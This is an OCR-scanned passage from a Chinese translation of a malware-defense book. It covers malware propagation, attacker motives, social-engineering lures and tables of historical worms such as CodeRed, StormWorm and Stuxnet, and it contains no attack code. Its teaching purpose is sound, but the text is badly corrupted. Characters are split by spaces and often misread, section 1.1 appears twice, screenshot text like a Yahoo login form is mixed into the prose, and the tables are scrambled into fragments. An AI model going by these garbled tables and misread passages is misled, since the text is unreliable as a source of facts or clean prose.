周 六 上 午 11 点 ，I 芽 部 门 认为 已 经 从 网 络 上 完全 删除 了 这 个 恶意 软件 。 员 工 们 在 周一 将 能 够 正常 工作 ,但 是 IT 部 门 仍然 有 很 
多 工作 需要 做 ， 病 毒 感染 造成 了 严重 的 破坏 ， 和 致使 30 台 工作 站 必须 重建 ， 因 为 恶意 软件 还 没有 完全 地 从 每 台 工 作 站 上 删除 。 


下 周一 下 午 3 点 ，CIO 与 CEO 会 谈 ， 给 出 了 清除 这 一 问题 所 要 花费 的 成 本 估算 。 他 们 都 无 法 弄 清 ， 实 际 损 失 的 销售 人 额 或 者 受 
到 影响 无 法 正常 工作 的 1500 个 工人 的 产 出 。 而 有 全 ，CIO 告 诉 CEO ， 由 于 恶意 软件 在 他 们 登录 网 上 银行 账户 时 记录 击 键 ， 所 以 他 们 
的 身份 被 窃取 了 。 这 些 受 害 的 员工 希望 知道 公司 所 能 对 他 们 提供 的 帮助 。 


上 面 这 样 的 情况 并 不 少见 。 每 个 案例 的 技术 细节 可 能 不 一 样 ， 但 是 周一 CIO 和 CEO 的 会 谈 内 容 很 相似 。 这 个 制造 机 构 中 没有 
人 预见 到 这 种 情况 ， 但 是 商业 杂志 和 每 份 安 全 报告 都 提 到 过 这 是 难以 避免 的 。 这 个 案例 中 的 主要 问题 是 该 公司 没有 准备 。 和 战争 
中 一 样 ， 知 识 是 成 功 的 一 半 ， 而 大 部 分 的 组 织 都 不 了 解 恶 意 软 件 ， 不 了 解 这 些 软件 是 如 何 编写 的 ， 又 是 为 什么 编写 的 ， 这 些 组 织 
都 没有 合适 的 策略 和 程序 来 处 理 bot 的 全 面 爆 发 。 在 我 们 的 案例 研究 中 ，IT 用 于 恢复 业务 运行 所 花费 的 总 时 间 很 长 ， 而 且 还 不 包 
括 所 有 因为 恶意 软件 捕捉 个 人 身份 信息 所 引起 的 通知 、 违 规 或 者 法 律 成 本 。 想 象 一 下 ， 组 织 付出 的 代价 有 多 大 。 


第 1 草 ”恶意 软件 传播 


11 恶意 软件 仍 是 王者 


21 世 纪 的 第 二 个 十 年 行将 结束 ， 我 们 仍然 看 到 10 年 前 令 人 惊讶 的 技术 、 工 具 、 平 台 和 容量 大 爆炸 。 从 本 书 的 第 1 版 起 ， 在 所 
使 用 技术 的 层面 ， 情 况 已 经 有 了 很 大 的 变化 ， 但 是 令 人 吃惊 的 是 ， 传 染 方法 仍然 保持 原状 。 网 络 上 充斥 着 犯罪 分 子 使 用 的 新 概 
念 、 活 动 和 工具 ， 它 们 蒙蔽 了 世界 上 的 数 百 万 人 人。 今天， 许多 威胁 的 新 变种 已 经 形成 ， 将 我 们 带 入 新 的 情境 之 中 。 雇 主 们 对 晨报 
的 标题 越 来 越 神经 质 ， 因 为 遭 到 无 名 威胁 的 侵害 、 使 无 价 的 网 络 受 损 的 可 能 性 总 是 存在 。 


遭 到 侵害 的 公司 和 组 织 的 敏感 数据 倾泻 到 网 络 上 ， 供 公众 免费 查看 的 情况 已 经 司空 见 惯 。 大 部 分 时 候 ， 这 些 数 据 泄露 可 能 通 
过 恶意 软件 入 侵 而 实现 。 恶 意 软件 传播 到 目标 网 络 ， 如 果 目 标 没有 配备 对 抗 恶 意 软 件 及 其 传播 技术 的 合适 工具 ， 它 们 就 可 能 成 为 


很 明显 ， 恶 意 软件 仍 是 王者 一 一 是 使 互联 的 数字 化 资产 和 设备 网 络 饱 受 折磨 的 威胁 中 的 王者 。 


第 1 草 ”恶意 软件 传播 


11 ”有 恶意 软件 仍 是 王者 


21 世 纪 的 第 二 个 十 年 行将 结束 ， 我 们 仍然 看 到 10 年 前 令 人 惊讶 的 技术 、 工 具 、 平 台 和 容量 大 爆炸 。 从 本 书 的 第 1 版 起 ， 在 所 
使 用 技术 的 层面 ， 情 况 已 经 有 了 很 大 的 变化 ， 但 是 令 人 吃惊 的 是 ， 传 染 方法 仍然 保持 原状 。 网 络 上 充斥 着 犯罪 分 子 使 用 的 新 概 
念 、 活 动 和 工具 ， 它 们 蒙蔽 了 世界 上 的 数 百 万 人 人。 今天， 许多 威胁 的 新 变种 已 经 形成 ， 将 我 们 带 入 新 的 情境 之 中 。 雇 主 们 对 晨报 
的 标题 越 来 越 神经 质 ， 因 为 遭 到 无 名 威胁 的 侵害 、 使 无 价 的 网 络 受 损 的 可 能 性 总 是 存在 。 


遭 到 侵害 的 公司 和 组 织 的 敏感 数据 倾泻 到 网 络 上 ， 供 公众 免费 查看 的 情况 已 经 司空 见 惯 。 大 部 分 时 候 ， 这 些 数 据 泄露 可 能 通 


过 恶意 软件 入 侵 而 实现 。 恶 意 软 件 传播 到 目标 网 络 ， 如 果 目 标 没 有 配备 对 抗 恶 意 软 件 及 其 传播 技术 的 合适 工具 ， 它 们 就 可 能 成 为 


很 明显 ， 恶 意 软件 仍 是 王者 一 一 是 使 互联 的 数字 化 资产 和 设备 网 络 饱 受 折磨 的 威胁 中 的 王者 。 


1.2 ”恶意 软件 的 传播 现状 


恶意 软件 仍然 以 极 快 的 速度 传播 。 用 于 传播 恶意 软件 的 技术 没有 变化 ， 但 是 有 了 一 定 的 改进 ， 并 根据 目标 实体 专门 进行 了 调 
整 。 在 前 一 个 案例 研究 中 ， 攻 击 者 使 用 的 电子 邮件 就 是 一 个 例子 。 它 说 明 ， 通 过 提 及 季度 会 议 ， 攻 击 者 使 用 的 钓鱼 邮件 中 包含 了 
仅 适 用 于 目标 的 内 容 。 从 本 书 第 1 版 发 行 起 ， 大 部 分 黑客 都 使 用 定制 的 恶意 软件 传播 技术 ， 攻 击 目标 组 织 。 


攻击 者 仍然 使 用 这 些 久 经 考验 的 技术 。 他 们 的 动机 也 仍然 是 金钱 、 盗 窃 敏 感 信息 和 持续 对 目标 系统 进行 未 授权 访问 。 这 就 是 
攻击 者 创造 的 机 制 现在 变 得 隐身 性 更 好 、 更 加 小 心 翼 屠 、 根 据 目 标定 制 的 原因 。 恶 意 软 件 已 经 变 得 更 加 逐 利 ， 而 不 是 为 了 乐趣 。 


1.3 ”为 什么 他 们 想 要 你 的 工作 站 


技术 进步 和 攻击 的 有 效 性 是 攻击 者 改变 方法 的 因素 ， 但 是 他 们 的 目标 一 一 你 最 终 为 他 们 做 出 了 决定 。 恶 意 软件 和 Rootkit 的 
作者 意识 到 他 们 能 够 利用 所 创建 的 恶意 软件 窃取 敏感 数据 (如 你 的 网 上 银行 用 户 名 和 密码 ) ， 实 施 单 击 欺诈 ， 将 受 感染 的 工作 站 
的 远程 控制 权 卖 给 垃圾 邮件 制造 者 作为 垃圾 邮件 中 继 站 ， 这 些 都 能 为 他 们 带 来 收入 。 亚 意 软件 作者 可 能 从 人 花费 在 编写 恶意 软件 的 
时 间 上 得 到 确实 的 回报 。 你 的 工作 站 现在 比 以 前 更 有 价值 ; 因此， 攻击 者 的 工具 需要 适应 保持 对 受 感染 工作 站 的 控制 ， 并 且 尽 可 
能 地 传染 更 多 的 工作 站 。 重 要 的 是 ， 要 注意 到 使 用 其 他 人 的 机 器 ， 攻 击 者 可 以 实现 如 下 目标 : 


* 使 罪行 更 难 与 攻击 者 联系 起 来 。 
` 避免 罪犯 被 隔离 出 来 ， 因 为 被 传染 的 机 器 通常 对 业务 很 关键 。 
" 利用 僵尸 军 团 提 供 的 计算 能 力 。 


家 庭 用 户 不 是 恶意 软件 作者 的 唯一 目标 。 集 团 公 司 的 工作 站 同样 有 趣 和 诱 人 。 企 业 工作 站 用 户 通常 在 本 地 工作 站 上 保存 集团 
公司 机 密 文档 ， 登 录 个 人 账户 (如 银行 账户 ) ， 登 录 到 包含 集团 公司 知识 产权 的 服务 器 。 所 有 这 些 都 是 攻击 者 感 兴趣 的 ， 一 般 也 
是 恶意 软件 感染 中 所 收集 的 内 容 。 


工作 站 是 敏感 信息 的 主要 来 源 ， 也 是 获得 网 络 服务 器 访问 权 的 跳板 ， 特 别 是 在 工作 站 有 权 连 接 组 织 中 受到 高 度 保护 的 网 段 的 
情况 下 。 


1.4 ”难以 友 现 的 意图 


局 面 的 改变 加 强 了 恶意 软件 作者 在 技术 上 的 挑战 性 ， 但 是 最 大 的 变化 是 意图 的 变化 。 过 去 多 年 来 ， 许 多 病毒 作者 编写 病毒 纯 
粹 是 为 了 自我 满足 和 向 朋友 炫耀 。 病 毒 编写 者 是 以 新 技术 或 者 大 规模 破坏 为 乐 的 地 下 组 织 的 一 部 分 。 对 “最 能 干 的 病毒 创作 
者 ”称号 的 角逐 致使 许多 病毒 制作 者 将 所 创建 的 程序 封装 起 来 并 发 布 ， 导 致 了 更 大 的 危害 。 这 种 行为 就 像 许多 糟糕 的 电影 里 的 情 
节 ， 两 个 男孩 子 在 争夺 一 位 高 中 女生 时 不 断 地 试图 超越 对 方 ， 等 他 们 清醒 过 来 时 ， 所 留 下 的 只 是 破坏 。 最 终 ， 两 个 男孩 都 不 能 得 
到 那个 女孩 ， 并 且 因 为 自己 的 愚蠢 而 待 在 牢 里 。 发 布 病毒 正 与 此 相同 ， 在 许多 国家 ， 编 写 病 毒 是 违法 的 ， 这 些 病毒 制作 者 被 捕 并 
且 受 到 起 诉 。 


有 些 病 毒 制作 者 不 是 为 了 自我 满足 而 是 为 了 抗议 ， 比 如 Onel A.De Guzman 的 案子 。De Guzman 就 像 是 菲律宾 的 罗宾汉 。 
他 编写 了 “我 爱 你 ”病毒 的 一 部 分 ， 这 个 病毒 窃取 人 们 用 于 访问 互联 网 的 账户 和 密码 ， 并 把 这 些 信 息 提 供给 其 他 人 使 用 。 在 菲 律 
宾 ， 互联 网 访问 资费 每 月 高 达 100 美 元 ,许多 人 将 他 的 病毒 看 作 很 大 的 利益 。 除 了 De Guzman， 保 加 利 亚 的 病毒 制作 者 Dark 


Avenger 因 为 声称 “这 些 病 毒 给 了 他 在 保加利亚 所 不 能 得 到 的 政治 权力 和 自由 ”而 闻名 。 亚 意 软 件 和 Rootkit 不 是 为 了 自我 满足 
或 者 抗议 ， 它 们 的 目的 是 金钱 。 


恶意 软件 制作 者 想 要 钱 ， 最 容易 的 方法 就 是 从 你 那里 偷 。 他 们 编写 程序 的 意图 已 经 有 了 根本 的 改变 。 恶 意 软件 和 Rootkit 现 
在 是 精密 的 盗 穿 工具 ， 而 不 是 夺 光 自己 和 向 朋友 宣扬 的 广告 牌 。 为 什么 这 种 转变 很 重要 呢 ? 


恶意 软件 制作 者 意图 的 转变 向 保护 用 户 免 遭 恶意 软件 侵害 的 人 们 传递 了 一 个 信号 ， 他 们 必须 改变 自己 的 检测 和 预防 能 力 。 病 
毒 和 蠕虫 在 技术 上 是 异常 现象 ,一般 来 说 ， 它 们 的 功能 不 是 由 普通 用 户 可 能 运行 的 常见 功能 集 (比如 字 处 理 ) 组 成 的 ; 因此 ， 发 
现 和 防御 这 种 异常 现象 要 比 发 现 一 个 用 户 进行 某 种 恶意 行为 更 容易 。 发 现 恶 意 行为 的 问题 在 于 谁 来 定义 恶意 行为 ， 是 防 病毒 公司 
还 是 媒体 ”不 同 的 计算 机 用 户 有 不 同 的 风险 容忍 度 ， 一 个 人 可 能 容忍 一 个 恶意 软件 运行 以 获得 它 能 够 提供 的 好 处 ， 而 其 他 人 可 能 


不 能 忍受 任何 恶意 软件 。 


理解 一 个 合法 用 户 行为 的 意图 并 非 不 可 能 ， 但 是 很 难 。 世 界 各 地 的 政府 多 年 来 试图 在 执法 和 立法 范围 内 理解 人 类 行为 的 意 
图 ,但 是 收效 其 微 。 大 部 分 遵循 串 格 鲁 - 撤 克 撑 法 律 体系 的 国家 (比如 美国 ) 中 的 定罪 率 在 40% ~ 80%。 如 果 在 世界 上 存在 了 几 
百年 的 法 律 系统 都 很 难 确定 人 们 的 意图 ， 那 么 我 们 又 有 多 少 机 会 去 阻止 恶意 软件 ”我 们 相信 自己 能 够 做 到 ， 但 是 在 网 络 世界 中 ， 
我 们 所 面 对 的 是 前 所 未 有 的 战斗 ， 这 就 是 本 书 的 其 余部 分 关注 于 让 你 掌握 恶意 软件 传播 、 传 染 、 保 持 控制 和 窃取 数据 的 技术 知识 
的 原因 ， 掌 握 了 这 些 信息 ， 你 将 能 够 确定 运行 在 你 的 工作 站 上 的 应 用 程序 的 意图 ， 并 且 迈 出 保护 你 的 网 络 免 遭 恶意 软件 侵害 的 第 


cd 
Wo 


1.5 “这 是 桩 生意 


前 面 已 经 提 到 ， 恶 意 软 件 制作 者 天 注 于 获得 利益 。 和 所 有 希望 赚钱 的 企业 家 一 样 ， 他 们 启动 各 种 利用 形式 的 商业 活动 。 对 于 
网 络 犯 罪 分 子 来 说 ， 没 有 投资 回报 的 攻击 活动 是 浪费 时 间 。 投 资 必须 得 到 回报 ， 窃 取 的 信息 可 以 出 售 ， 金 融 凭据 可 以 非法 使 用 ， 
对 计算 机 系统 的 未 授权 访问 可 以 从 竞争 组 织 那里 得 到 不 菲 的 价格 。 


许多 组 织 向 愿意 付 钱 的 人 提供 恶意 软件 相关 服务 ， 这 些 犯 罪 组 织 往往 在 没有 网 络 犯罪 相关 立法 或 者 无 法 跟踪 、 起 诉 它 们 的 国 
家 运作 。 


1.6 ”恶意 软件 传播 的 主要 技术 


传统 上 ， 恶 意 软 件 攻击 像 Microsoft Windows, Linux, Mac OS, Microsoft Office 这 样 的 平台 和 应 用 程序 ， 以 及 许多 第 
三 方 应 用 程序 。 有 些 恶 意 软件 甚至 由 制造 商 不 知 不 觉 地 散布 ， 并 且 直 接 嵌 入 安装 光盘 上 直到 几 个 月 后 才 被 发 现 ， 这 种 现象 现在 仍 
有 发 生 。20 世 纪 90 年 代 两 种 最 流行 的 传播 方式 是 通过 电子 邮件 和 直接 文件 执行 。 现 在 对 你 们 来 说 这 似乎 已 经 不 重要 ， 但 讲述 几 
次 恶意 软件 的 爆发 仍然 很 重要 。 最 重要 的 是 需要 理解 过 去 多 年 中 技术 的 革新 和 现在 常见 的 技术 ， 并 且 了 解 这 些 方法 的 起 源 。 我 还 
希望 前 明 ，“ 熟 悉 而 可 靠 ” 的 技术 仍然 和 和 20 年 前 一 样 管用 。 安 全 业界 通过 从 使 他 们 遭受 挫败 的 传播 技术 那里 学 习 到 的 经 验 ， 并 
发 展 到 今天 的 水 平 ， 但 是 现在 仍然 面 对 着 与 基于 这 些 技术 的 攻击 斗争 和 防御 的 挑战 。 最 后 ， 对 于 那些 刚刚 进入 这 个 行业 、 对 这 些 
恶意 软件 发 布 认识 尚未 成 熟 的 读者 来 说 ， 这 是 对 恶意 软件 传播 技术 的 一 个 简单 概括 。 


1.61 社会 工程 


历史 上 ， 通 过 网 络 分 发 和 传播 恶意 软件 的 最 古老 但 仍然 最 有 效 的 方法 是 侵犯 人 类 的 信任 关系 。 例 如 ， 社 会 工程 (social 
engineering) 方法 指 编造 一 个 故事 ， 然 后 将 这 个 故事 传递 给 受害 人 ， 和 希望 受害 人 相信 这 个 故事 并 且 采 取 想 定 的 步骤 以 便 执 行 亚 
意 软件 。 一 般 来 说 ， 尽 管 有 时 候 这 种 分 发 方法 或 者 故事 所 用 的 “虚假 事实 ”非常 肤浅 ， 但 是 用 户 没 有 意识 到 实际 发 生 的 传染 。 有 
时 候 用 户 感觉 到 有 些 问 题 ， 或 者 某 个 事件 引起 用 户 的 怀疑 ， 经 过 简单 的 检查 ， 用 户 发 现 了 整个 阴谋 。 接 着 ， 企 业 安全 团队 试图 删 
除 恶 意 软 件 并 且 防 止 通过 网 络 的 传播 。 没 有 社会 工程 ， 今 天 的 几乎 所 有 恶意 软件 都 无 法 感染 系统 。 下 图 是 一 些 编造 “虚假 事 
实 ”、 和 希望 用 户 单 击 而 被 感染 或 者 提供 个 人 信息 的 恶意 屏幕 。 


File Download 过 x| 





You have chosen to download a file from this location. 


axmsetup.107.exe from Removed 


What would you like to do with this file? 


C Run this program from its current location 


TT 


IV Always ask before opening this type of file 





Cancel | More Info | 





Microsoft Internet Explorer 


NOTICE: Your computer has tracks of adult dites you had visited. In most cases, you are not even aware of the 
files that get installed by themselves, violate your online privacy and could compromise your career and your 
marriage. These files leave tracks of your online behavior and even compromise your credit card's security. It is 


possible to clean up all the temporary and history records of your computer to remove the tracks. Would you 
like to install Spyware fighter to check your computer for free? (Recommended) 
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Take Yahoo! with you, 
wherever you go 


Tellme more 


Why OpenID? 


e No need to create a new account on websites that support the 
OpenID technology. No more forgotten passwords when you try 
new websites 


e Just tell websites that you are a Yahoo! user, sign in to Yahoo!, 
and you will be on your way. 


e Hundreds of websites support the OpenID technology. And this 
list is growing every day. Get started. 


下 面 的 简短 列表 列 出 了 一 些 模棱两可 的 文件 名 ， 恶 意 软 件 编写 者 用 它们 诱 使 那些 未 起 疑心 的 社会 工程 受害 者 打开 它 ， 从 而 开 


始 传染 过 程 : 
- ACDSee9.exe 
- Adobe Photoshop? full.exe 
- Ahead Nero7.exe 
+ Matrix3Revolution English Subtitles.exe 
- Microsoft Office2003Crack, Working! .exe 
- Microsoft Windows XP, WinXP Crack, working Keygen.exe 
+ Porno Screensaver.scr 
- Serials.txt.exe 
- WinAmp6New! .exe 


+ Windows Sourcecode update.doc.exe 


1.6.2 ”文件 执行 


Yahoo! - Help 


Sign in 
to Yahoo! 


Yahoo! ID: 


(e.g. free2rhyme@yahoo.com) 


Password: 


Keep me signed in 
for 2 weeks unless | sign out, nfo 
[Uncheck if on a shared computer] 


Sign In 


Forget your ID or password? | Help 





Don't have a Yahoo! ID? 
Signing up is easy. 
Sign Up 














事实 上 ， 文 件 执行 是 恶意 软件 传染 的 最 直接 方法 。 用 户 单 击 重 命名 或 者 做 入 在 另 一 个 文件 中 (例如 可 执行 文件 、Microsoft 
Office 文 档 、Adobe PDF 或 者 压缩 文件 ) 的 文件 。 该 文件 可 以 通过 刚才 讨论 的 社会 工程 技术 或 者 通过 对 等 (P2P) 网 络 、 企 业 
网 络 文件 共享 、 电 子 邮 件 或 者 非 易 失 性 存储 设备 传递 。 现 在 ， 某 些 恶意 软件 能 够 以 可 下 载 的 flash 游 戏 的 方式 传递 ， 在 你 享受 游 
戏 的 同时 ， 在 后 台 你 的 系统 已 经 成 为 某 人 的 诡计 (如 StormWorm) 的 受害 者 。 你 所 遇 到 的 某 些 感染 只 是 来 自 于 一 个 简单 的 平面 
设计 动画 、 跳 舞 能 的 PowerPoint 幻 灯 片 、 甚 至 一 篇 爱国 主义 的 故事 。 这 种 传播 技术 一 一 文件 执行 是 所 有 恶意 软件 的 基础 。 本 质 
上 ， 如 果 你 不 执行 恶意 软件 ， 那 么 它 就 无 法 感染 你 的 系统 。 表 1-1 列 出 了 通过 文件 执行 传递 恶意 软件 的 各 种 基于 Windows 文 件 类 
型 的 简单 实例 ， 图 1-1 说 明 最 常用 于 电子 邮件 的 文件 类 型 。 


表 1-1 用 于 传递 恶意 软件 的 最 常见 文件 类 型 


文件 扩展 名 关联 应 用 程序 
.FLV Adobe Flash Player 
.DOCX Microsoft Word 文档 
.PPTX Microsoft Power Point 
.XLSX Microsoft Excel 
.EXE 可 执行 文件 
.PDF Adobe Reader 文件 格式 
.BAT Windows 批 命令 文件 


恶意 软件 的 祖先 采用 的 方法 是 奇特 的 ， 而 且 多 半 经 过 精心 的 思考 ， 并 且 造 成 的 破坏 至 多 是 毁坏 计算 机 本 身 。 这 些 攻击 者 更 关 
注 于 通过 发 表 概念 性 的 代码 表现 自我 和 独创 性 ， 他 们 所 发 表 的 恶意 软件 在 实现 上 有 多 种 弱点 ， 例 如 容易 识别 的 二 进 制 代码 、 系 统 
入 口 以 及 容易 发 现 的 传播 技术 。 他 们 的 方法 使 安全 专家 在 夜 时 惊醒， 提心吊胆 地 等 待 着 更 好 的 防 病毒 引擎 和 网 络 入 侵 检 测 系统 开 
发 出 来 。 图 1-2 提 供 了 入 侵 检测 系统 生命 周期 的 时 间 轴 ， 在 20 世 纪 90 年 代 末 和 21 世 纪 初 ， 这 是 识别 通过 网 络 传播 的 恶意 软件 的 最 
佳 工具 。 


1% 











I zip, Zip Archive 

pdf, PDF Document 

Hi mp3, MP3 Audio File 

Wi jpg, JPEG Image 

I rar, RAR Archive 

MM exe, Executable File 

fi wmv, Windows Media Video 

E] doc, Micr osoft Word Document 
E avi, Audio Video Interleave 





国 ppt, Micr osoft PowerPoint Presentation 
E mpg, MPEG-1 Video 
P| tif, Tagged Image File Format 





加 wav, Waveform Audio Format 
F| mov, QuickTime 
C] psd, Photoshop Document 





图 1-1 最 常见 的 电子 邮件 文件 类 型 


1984 1998 
Denning 设计 ID ED 模型 1989 Cisco 收购 Wheel 集团 
Haystack 实验 室 

















1980 1987 1994 1999 
Anderson 的 文章 : 计算 机 Denning 的 文章 : 入 侵 Wheel 集团 Centrax 集团 公司 
安全 威胁 监控 与 跟踪 检测 模型 


2001 

















1988 
1983 Havstack 项 目 99 2001 
IDS 的 第 一 个 IDS 项 目 ee ISS ae IPS 诞生 
1991 
1999 
1984 空军 的 ASM 进入 eae 
IDES 开发 成 功 工 IDS 进入 繁荣 期 
图 1-2 ”入 侵 检 测 系统 时 间 轴 
表 1-2 揭 示 了 最 臭名 昭著 的 早期 恶意 软件 攻击 所 使 用 的 传播 技术 。 
表 1-2 早期 恶意 软件 攻击 所 用 的 传播 技术 
恶意 软件 注入 技术 传播 技术 
电子 邮件 附件 文件 传染 
Wl 文件 执行 用 户 共享 和 执行 
电子 邮件 附件 ae 
Happy99 We 文件 执行 CorelDraw 应 用 程序 传染 
电子 邮件 附件 文件 植 入 程序 (dropper) 
2000 
aerial 2000 | 文件 执行 覆盖 /删除 
电子 邮件 附件 ,© l 
2000 独特 的 文件 松弛 空间 -填充 方法 
| 2000 | 文件 执行 
ae m 电子 邮件 附件 用 于 将 本 身 附 加 到 所 有 受 感染 系统 发 出 的 电子 邮 
文件 执行 件 中 的 MAPI.dll 钩子 
CodeRed 网 络 服务 漏洞 直接 利用 服务 漏洞 
CodeRedll 网 络 服务 漏洞 直接 利用 服务 漏洞 ， 由 版 本 1 改进 而 来 
电子 邮件 附件 电子 邮件 附件 
文件 执行 文件 执行 
ee i 局 域 网 扫描 局 域 网 扫描 
Web 蠕虫 Web 蠕虫 
Slammer 网 络 服务 漏洞 直接 利用 服务 漏洞 
MSBlast 网 络 服务 漏洞 直接 利用 服务 漏洞 
Sobi 5003 电子 邮件 附件 文件 植 人 程序 (dropper) 
8 文件 执行 覆盖 / 删除 原文 件 


wane REER 


电子 邮件 附件 后 门 /远程 访问 
] 200 
vee 文件 执行 远程 更 新 程序 


电子 邮件 附件 


nis 以 通过 像 Kazaa, Morpheus, Gnutella 这 样 的 
Netsk 2003 文件 
ie alone 互联 网 共享 程序 的 基于 对 等 传播 为 关注 点 
文档 附件 


Sasser 网 络 服务 漏洞 直接 利用 服务 漏洞 


每 个 分 配 单元 中 没有 用 完 的 部 分 空间 。 











注 : 松弛 空间 (slack space) 译 者 注 


1.7 ”现代 恶意 软件 的 传播 技术 


由 于 网 络 应 用 程序 、 网 络 服务 和 操作 系统 功能 中 具有 创造 力 的 进步 ， 对 于 IDS 来 说 ， 发 现 恶 意 软 件 的 传播 已 经 比 以 前 困难 得 
多 了 。1DS 特 征 码 已 经 被 证 明 在 对 抗 恶 意 软件 的 新 版 本 或 者 多 态 的 恶意 软件 时 没有 什么 帮助 。 在 21 世 纪 初 ， 出 现 了 全 新 的 传播 技 
术 ， 这 些 技术 起 源 于 从 过 去 的 恶意 软件 爆发 时 学 习 到 的 经 验 。 


恶意 软件 已 经 发 展 到 如 此 高 的 水 平 ， 以 致 我 们 现在 只 能 依赖 专家 来 预测 可 能 出 现 的 恶意 软件 爆发 事件 ， 或 者 旧 的 技术 在 什么 
地 方 采 用 创新 的 方法 造成 比 过 去 更 大 的 破坏 。 新 的 技术 利用 操作 系统 和 应 用 程序 的 系统 改进 和 功能 升级 来 对 付 最 终 用 户 。 表 1-3 
列 出 了 恶意 软件 传播 方法 的 一 些 最 新 进展 。 


表 1-3 中 描述 的 蠕虫 使 用 了 新 的 传染 和 传播 方法 并 且 成 为 近期 |T 界 重要 的 恶意 软件 爆发 的 根源 。Downadup 蠕 虫 在 不 到 5 天 
的 时 间 内 感染 了 超过 900 万 台 计 算 机 。Sstuxnet 的 发 现 说 明 ， 恶 意 软件 可 以 用 于 摧毁 基础 设施 。 评 估 恶 意 病毒 的 开发 非常 重要 
一 一 从 对 付 组 织 的 针对 性 恶意 软件 到 执行 恶意 代码 远程 控制 受害 计算 机 的 简单 客户 端 利用 程序 。 尽 管 在 刊物 和 每 个 人 阅读 的 报 
纸 上 报 道 的 几乎 所 有 流行 实例 都 是 以 Microsoft Windows 为 焦点 的 恶意 软件 ， 但 确定 所 有 恶意 软件 的 数量 仍然 很 天 键 。 


表 1-3 恶意 软件 的 革新 


恶意 软件 注入 技术 传播 技术 
文件 植 入 程序 

StormWorm 2007 ~ 2008 电子 邮件 附件 / 文件 执行 覆盖 /删除 

P2P C2 结构 和 Fast Flux 通信 和 链 


AutoIT 2008 文件 执行 Res or EA 


文件 传送 ， 文 件 共 享 ， 通 过 网 络 共享 或 
d la 
eee an 者 带 有 弱 密码 的 共享 自我 复制 
Bacteraloh 文件 执行 (基于 P2P 网 络 ) | ”伪装 成 用 户 下 载 并 本 地 执行 的 破解 工具 





通过 Facebook, MySpace, Friendster 和 
客户 端 利用 LiveJournal 等 社交 网 站 装载 链接 到 恶意 软 
件 的 URL 进行 传播 


Koobface 2009 





恶意 软件 注入 技术 传播 技术 


Stuxnet 文件 执行 (漏洞 ) 为 攻击 核 设 施 而 专门 调整 
邮件 附件 
69 银行 特洛伊 木马 Zeus 和 SpyEye 的 组 合 
加 多 文件 恶意 软件 ， 每 个 文件 有 不 同 功 
D 文件 执行 (漏洞 ) — 
i sie 能 ， 包 括 信息 窃取 能 力 
2012 年 发 现 的 攻击 工具 包 , 但 是 据 分 析 
从 2010 年 起 就 开始 运作 了 
Flame 2012 文件 执行 从 年 起 就 开始 运作 T 


嗅 探 网 络 流量 ， 记 录 击 键 ， 录 制 音频 对 
话 ， 截 取 屏 幕 


- specs Ransomware 假扮 来 自 FBI 的 软件 。 拒 
sia ii ARAN 绝 系统 文件 访问 ， 然 后 勒索 赎金 

电子 邮件 附件 
BlackEnergy 2014 i A Bf chi 从 被 侵害 系统 的 硬盘 上 收集 数据 

文件 执行 


在 恶意 软件 最 初 发 展 阶段 使 用 的 技术 在 当今 的 恶意 软件 版 本 中 仍然 概念 性 地 存在 。 由 于 网 络 的 进步 以 及 简化 网 络 管理 员 日 常 
任务 和 职责 的 路 由 服务 的 开发 ， 这 些 技术 造成 的 损害 比 过 去 更 大 了 。 











在 21 世 纪 来 临 的 时 刻 ， 恶 意 软 件 制作 者 也 开始 使 用 让 取证 分 析 师 和 网 络 防御 专家 更 加 难以 识别 和 缓解 的 技术 。 历 史上 ， 这 
些 方法 包括 了 从 传统 的 简单 方法 到 使 世界 上 的 许多 管理 员 感到 头疼 的 具有 很 强 的 独创 性 的 方法 。 在 下 面 的 部 分 中 ， 我 将 讨论 一 次 
最 大 的 恶意 软件 爆发 事件 ， 然 后 描述 其 他 的 恶意 软件 实例 及 其 功能 性 。 


2007 年 ， 我 们 有 幸 遇 到 了 到 目前 为 止 最 难以 捉摸 ， 最 具有 说 服 力 表现 的 一 种 蠕虫 StormWorm。 
1.7.1 StormWorm 


stormWorm 是 一 个 邮件 蠕虫 ， 采 用 社会 工程 ， 在 来 自 可 信和 朋友 的 邮件 中 附加 二 进 制 文件 或 者 在 Microsoft Officelft4+Fax 
入 恶意 代码 ， 然 后 对 Microsoft Internet Explorer 和 Microsoft Office 〈 有 具体 版 本 是 2003 和 2007) 的 脆弱 版 本 发 动 大 家 熟悉 的 
客户 端 攻击 。stormWorm 是 一 种 影响 使 用 Microsoft 操 作 系 统 的 对 等 僵尸 网 络 框架 和 后 门 特洛伊 木马 ， 在 2007 年 1 月 17 日 最 早 
发 现 。stormWorm 培 育 了 一 个 对 等 僵尸 场 网 络 (botnet farm network) ， 这 是 一 种 更 新 的 控制 指挥 技术 ， 用 来 确保 集群 的 持 
续 性 ， 并 且 增 强 了 它 的 控制 指挥 中 心 的 生存 能 力 ， 因 为 在 这 里 没有 单独 的 中 央 控 制 点 。 每 台 被 侵害 的 机 器 连接 到 整个 僵尸 网 络 集 
群 的 一 个 子 集 ， 包 括 25 ~ 50 台 其 他 受 侵害 的 机 器 。 在 图 1-3 中 ， 你 可 以 看 到 StormWorm 的 控制 指挥 结构 的 效率 一 一 这 是 它 难以 
防范 和 跟踪 的 主要 原因 之 一 。 


在 对 等 僵尸 网 络 中 ， 没 有 一 台 机 器 拥有 整个 网 络 的 完整 列表 ; 每 台 机 器 只 有 总 表 的 一 个 子 集 ， 这 些 子 集 中 含有 重 蔷 的 机 器 ， 
分 布 得 像 一 个 错综复杂 的 蜂 蛛 网 ， 使 得 这 个 邪恶 的 网 络 的 范围 难以 确定 。StormWorm 的 大 小 从 未 被 精确 计算 过 ， 但 是 ,估计 它 
是 有 史 以 来 最 大 的 僵尸 网 络 ， 可 能 包含 100 万 ~ 1000 万 个 受害 系统 。StormWorm 如 此 巨大 ， 以 至 于 在 其 运作 者 发 现 多 家 国际 安 
全 集团 积极 与 这 一 僵尸 网 络 战斗 并 试图 拆除 它 时 ， 向 这 些 安全 集团 发 动 了 攻击 。 由 于 这 一 国际 性 僵尸 网 络 的 强大 力量 ， 国 际 性 的 
安全 集团 和 机 构 遭 到 了 挫败 。 
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图 1-3 ” 按 国家 分 布 的 StormWorm 感 染 情 况 


感染 时 ，StormWorm 将 安装 Win32.Agent.dh， 这 不 可 避免 地 导致 制作 者 实现 的 第 一 个 变种 的 垮台 。 有 些 安全 集团 感到 ， 
